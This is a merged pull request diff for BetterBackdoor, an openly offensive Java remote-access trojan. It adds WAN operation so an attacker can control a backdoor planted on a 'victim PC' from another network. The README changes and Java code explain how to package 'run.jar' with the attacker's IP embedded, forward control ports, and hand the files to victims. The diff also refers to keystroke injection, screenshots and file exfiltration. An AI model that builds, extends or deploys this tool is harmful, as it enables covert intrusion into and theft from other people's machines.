Merge pull request #15 from ThatcherDev/develop

Added usage over WAN with port forwarding

README.md

@@ -3,7 +3,7 @@
 
 A backdoor is a tool used to gain remote access to a machine. 
 
-Typically, backdoor utilities such as NetCat have 2 main functions: to pipe remote input into cmd or bash and output the response.
+Typically, backdoor utilities such as NetCat have two main functions: to pipe remote input into cmd or bash and output the response.
 This is useful, but it is also limited.
 BetterBackdoor overcomes these limitations by including the ability to inject keystrokes, get screenshots, transfer files, and many other tasks.
 
@@ -27,26 +27,31 @@ The attacker starts a server and the victim connects to this server as a client.
 Once a connection is established, commands can be sent to the client in order to control the backdoor. 
 
 To create the backdoor, BetterBackdoor:
-- Creates 'run.jar', the backdoor jar file, and copied it to directory 'backdoor'.
-- Appends a text file containing the server's IPv4 address to 'run.jar'. 
+- Creates 'run.jar', the backdoor jar file, and copies it to directory 'backdoor'.
+- Appends a text file containing the attacker's IP address to 'run.jar'. 
+  - Note: this IP address is written in plain text.
 - If desired, copies a Java Runtime Environment to 'backdoor' and creates batch file 'run.bat' for running the backdoor in the packaged Java Runtime Environment.
 
+The backdoor can operate within a single network, LAN, and over the internet, WAN. 
+However, in order to use the backdoor over WAN, port forwarding must be done. 
+
+For WAN use, ports 1025 and 1026 must be forwarded from the attackers computer with TCP selected. Once this is done, the backdoor can be controlled by the attacker even when the victim and attacker are on different networks.
+
 To start the backdoor on a victim PC, transfer all files from the directory 'backdoor' onto a victim PC.
 
 If a JRE is packaged with the backdoor, execute run.bat, otherwise execute run.jar. 
 
 This will start the backdoor on the victim's PC.
 
-Once running, to control the backdoor you must return to BetterBackdoor and run option 1 at start while connected to the same WiFi network as the victim's computer.
+Once running, to control the backdoor you must return to BetterBackdoor and run option 1 at start.
 
 ## Demo
 <a href="https://asciinema.org/a/6K0SOY7W8u7ligNoP3s912kwY" target="_blank"><img src="https://asciinema.org/a/6K0SOY7W8u7ligNoP3s912kwY.svg" width="600"/></a>
 
 ## Requirements
 - A Java JDK distribution >=8 must be installed and added to PATH.
 - You must use the same computer to create and control the backdoor.
-  - The computer used to create the backdoor must be on the same WiFi network as the victim's computer.
-  - The IPv4 address of this computer must remain static in the time between creating the backdoor and controlling it.
+  - The IP address of this computer must remain static in the time between creating the backdoor and controlling it.
 - The computer used to control the backdoor must have their firewall deactivated, and if the computer has a Unix OS, must run BetterBackdoor as 'sudo'.
 
 ## Compatibility
@@ -64,11 +69,7 @@ cd BetterBackdoor
 # for Windows run
 mvnw.cmd clean package
 
-# for Linux run
-chmod +x mvnw
-./mvnw clean package
-
-# for Mac run
+# for Linux and Mac run
 sh mvnw clean package
 ```
 
@@ -79,4 +80,4 @@ java -jar betterbackdoor.jar
 
 ## License
 - [MIT](https://choosealicense.com/licenses/mit/)
-- Copyright 2019 ©️ ThatcherDev.
+- Copyright 2019 © ThatcherDev.

src/main/java/com/github/thatcherdev/betterbackdoor/BetterBackdoor.java

@@ -3,6 +3,7 @@
 import java.io.File;
 import java.nio.file.Paths;
 import java.util.Scanner;
+import com.github.thatcherdev.betterbackdoor.backend.Utils;
 import com.github.thatcherdev.betterbackdoor.shell.Shell;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
 
@@ -30,6 +31,16 @@ public static void main(String[] args) {
 		System.out.println("[1] Open backdoor shell");
 		String choice = getInput("op01");
 		if (choice.equals("0")) {
+			System.out.println("Would you like this backdoor to operate within a single network, LAN, "
+					+ "or over the internet, WAN (requires port forwarding):");
+			System.out.println("[0] LAN");
+			System.out.println("[1] WAN (requires port forwarding)");
+			String ipType = null;
+			if (getInput("op01").equals("0"))
+				ipType = "internal";
+			else
+				ipType = "external";
+
 			boolean jre = false;
 			if (os.contains("Windows")) {
 				System.out.println(
@@ -39,25 +50,30 @@ public static void main(String[] args) {
 				System.out.println(
 						"If you would like to package a Java Runtime Environment with the backdoor so it can be run on computers without Java,\n"
 								+ "in the current working directory create folder 'jre' containing 'bin' and 'lib' directories from a Windows JRE distribution.\n");
+
 			System.out.println("Press ENTER to create backdoor...");
 			sc.nextLine();
 			System.out.println("Creating...\n");
 			try {
-				Setup.create(jre);
+				Setup.create(jre, ipType);
+				System.out.println("Created!\n");
+				if (ipType.equals("external"))
+					System.out.println(
+							"Using your routers settings page, forward ports 1025 and 1026 from this computer ("
+									+ Utils.getIP("internal") + ") with TCP selected.\n");
+				System.out.println(
+						"To start the backdoor on a victim PC, transfer all files from the directory 'backdoor' onto a victim PC.\n"
+								+ "If a JRE is packaged with the backdoor, execute run.bat, otherwise execute run.jar.\n"
+								+ "This will start the backdoor on the victim's PC.\n"
+								+ "To control the backdoor, return to BetterBackdoor and run option 1 at start.\n");
+				System.out.println("Press ENTER to exit...");
+				sc.nextLine();
 			} catch (Exception e) {
 				if (e.getMessage() == null)
 					error("Could not create backdoor");
 				else
 					error("Could not create backdoor:\n" + e.getMessage());
 			}
-			System.out.println("Created!\n");
-			System.out.println(
-					"To start the backdoor on a victim PC, transfer all files from the directory 'backdoor' onto a victim PC.\n"
-							+ "If a JRE is packaged with the backdoor, execute run.bat, otherwise execute run.jar.\n"
-							+ "This will start the backdoor on the victim's PC.\n"
-							+ "To control the backdoor, return to BetterBackdoor and run option 1 at start.\n");
-			System.out.println("Press ENTER to exit...");
-			sc.nextLine();
 		} else
 			Shell.start();
 	}

src/main/java/com/github/thatcherdev/betterbackdoor/Setup.java

@@ -28,14 +28,17 @@ public class Setup {
 	 * false but directory 'jre' containing a Windows JRE distribution exists, 'jre'
 	 * is copied to 'backdoor' and {@link #createBat(String, String, String)} is
 	 * used to create a '.bat' file for running the backdoor in the JRE. 'run.jar'
-	 * is copied from 'target' to 'backdoor' and 'ip', a text file containing the
-	 * current machine's IPv4 address, is appended into it using
-	 * {@link #appendJar(String, String, String)}.
-	 *
-	 * @param packageJre if a JRE should be packaged with backdoor
+	 * is copied from 'target' to 'backdoor' and 'ip' is appended into it using
+	 * {@link #appendJar(String, String, String)}. If {@link ipType} is "internal",
+	 * 'ip' will contain the internal IP address of the current machine. Otherwise,
+	 * if {@link ipType} is "external", 'ip' will contain the external IP address of
+	 * the current machine.
+	 * 
+	 * @param packageJre if a JRE should be packaged with the backdoor
+	 * @param ipType     type of IP address to append to 'run.jar'
 	 * @throws IOException
 	 */
-	public static void create(boolean packageJre) throws IOException {
+	public static void create(boolean packageJre, String ipType) throws IOException {
 		if (packageJre) {
 			String jrePath = System.getProperty("java.home");
 			FileUtils.copyDirectory(new File(jrePath + File.separator + "bin"),
@@ -49,7 +52,7 @@ public static void create(boolean packageJre) throws IOException {
 		}
 		FileUtils.copyFile(new File("target" + File.separator + "run.jar"),
 				new File("backdoor" + File.separator + "run.jar"));
-		appendJar("backdoor" + File.separator + "run.jar", "ip", Utils.getIP());
+		appendJar("backdoor" + File.separator + "run.jar", "/ip", Utils.getIP(ipType));
 	}
 
 	/**

src/main/java/com/github/thatcherdev/betterbackdoor/backdoor/Backdoor.java

@@ -27,8 +27,8 @@ public static void main(String[] args) {
 	 * <p>
 	 * Uses {@link #readFromJar(String)} to get the contents of "ip", a text file
 	 * inside the jar file this class will be running from. This file contains the
-	 * IPv4 address of the server to be used to control the backdoor. Sets
-	 * {@link #ip} to this address. Creates directory "gathered".
+	 * IP address of the server to be used to control the backdoor. Sets {@link #ip}
+	 * to this address. Creates directory "gathered".
 	 */
 	private Backdoor() {
 		try {

src/main/java/com/github/thatcherdev/betterbackdoor/backend/FTP.java

@@ -43,14 +43,14 @@ else if (protocol.equals("rec"))
 	 * Transfers a file with server.
 	 * <p>
 	 * Opens {@link java.nio.channels.SocketChannel} {@link socketChannel} for
-	 * transferring file with server with an IPv4 address of {@link ip}. If
+	 * transferring file with server with an IP address of {@link ip}. If
 	 * {@link protocol} is "send", uses {@link #send} to send file with path
 	 * {@link filePath} to server. If {@link protocol} is "rec", uses {@link #rec}
 	 * to receive file with path {@link filePath} from server.
 	 * 
 	 * @param filePath path of file to transfer
 	 * @param protocol if file should be sent or received
-	 * @param ip       IPv4 address of server to transfer file with
+	 * @param ip       IP address of server to transfer file with
 	 * @throws IOException
 	 */
 	public static void backdoor(String filePath, String protocol, String ip) throws IOException {

src/main/java/com/github/thatcherdev/betterbackdoor/backend/Utils.java

@@ -8,7 +8,7 @@
 import java.net.Inet6Address;
 import java.net.InetAddress;
 import java.net.NetworkInterface;
-import java.net.SocketException;
+import java.net.URL;
 import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.Enumeration;
@@ -87,25 +87,37 @@ public static void exfilFiles(String root, ArrayList<String> exts) throws IOExce
 	}
 
 	/**
-	 * Gets the IPv4 address of the current machine.
+	 * If {@link ipType} is "internal", returns the internal IP address of the
+	 * current machine. Otherwise, if {@link ipType} is "external", returns the
+	 * external IP address of the current machine.
 	 * 
-	 * @return IPv4 address of the current machine
-	 * @throws SocketException
+	 * @param ipType type of IP address to return
+	 * @return either the internal or external IP address of the current machine
+	 * @throws IOException
 	 */
-	public static String getIP() throws SocketException {
-		Enumeration<NetworkInterface> majorInterfaces = NetworkInterface.getNetworkInterfaces();
-		while (majorInterfaces.hasMoreElements()) {
-			NetworkInterface inter = (NetworkInterface) majorInterfaces.nextElement();
-			for (Enumeration<InetAddress> minorInterfaces = inter.getInetAddresses(); minorInterfaces
-					.hasMoreElements();) {
-				InetAddress add = (InetAddress) minorInterfaces.nextElement();
-				if (!add.isLoopbackAddress())
-					if (add instanceof Inet4Address)
-						return add.getHostAddress();
-					else if (add instanceof Inet6Address)
-						continue;
+	public static String getIP(String ipType) throws IOException {
+		String ret = null;
+		if (ipType.equals("internal")) {
+			Enumeration<NetworkInterface> majorInterfaces = NetworkInterface.getNetworkInterfaces();
+			while (majorInterfaces.hasMoreElements()) {
+				NetworkInterface inter = (NetworkInterface) majorInterfaces.nextElement();
+				for (Enumeration<InetAddress> minorInterfaces = inter.getInetAddresses(); minorInterfaces
+						.hasMoreElements();) {
+					InetAddress add = (InetAddress) minorInterfaces.nextElement();
+					if (!add.isLoopbackAddress())
+						if (add instanceof Inet4Address)
+							ret = add.getHostAddress();
+						else if (add instanceof Inet6Address)
+							continue;
+				}
 			}
+		} else if (ipType.equals("external")) {
+			URL checkIP = new URL("http://checkip.amazonaws.com");
+			BufferedReader in = new BufferedReader(new InputStreamReader(checkIP.openStream()));
+			String ip = in.readLine();
+			in.close();
+			ret = ip;
 		}
-		return null;
+		return ret;
 	}
 }